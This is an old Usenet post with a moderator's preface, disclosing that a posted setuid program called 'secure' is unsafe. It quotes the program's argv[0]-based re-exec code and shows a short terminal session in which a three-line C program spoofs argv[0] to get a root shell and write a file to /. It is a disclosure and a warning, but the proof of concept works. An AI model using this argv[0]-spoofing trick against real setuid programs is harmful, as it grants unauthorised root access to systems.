ruediger@ramz.UUCP (Ruediger Helsch) (12/07/88)
[I asked in a preface to this comp.sources.misc poting if it was secure. If I'd actually looked at the posting, I'd have bounced the thing myself. Guess that's the best reason yet to pay more attention to these beasties. ++bsa] In article <8811231522.AA14884@lakart.UUCP> dg@lakart.UUCP (David Goodenough) writes: > > if (strcmp(a[0], "SEC-URE"))/* I'm damned if I know why this is */ > { /* necessary, but it is */ > (void) strcpy(program, a[0]); > a[0] = "SEC-URE"; > execv(program, a); /* re exec ourselves so setuid bits work */ > exit(1); /* this should never happen */ > } > $ ls -l total 20 -rw-r--r-- 1 ruediger 4647 Dec 3 23:32 Part01 -rwsr-xr-x 1 root 10240 Dec 3 23:35 secure -rw-r--r-- 1 ruediger 1121 Dec 3 23:33 secure.8 -rw-r--r-- 1 ruediger 1247 Dec 3 23:34 secure.c -rw-r--r-- 1 ruediger 49 Dec 3 23:37 ttt.c $ cat >ttt.c main() { execl("secure","/bin/sh",(char*)0); } $ cc ttt.c $ a.out $ echo "and now i am root" >/warning $ ls -l /warning -rw-r--r-- 1 root 18 Dec 3 23:41 /warning $ You should better trust in ordinary setuid shell scripts. Takes some patience to break them. -- Ruediger Helsch | ruediger@ramz.uucp Hermannstrasse 1 | ..mcvax!unido!ramz!ruediger 33 Braunschweig |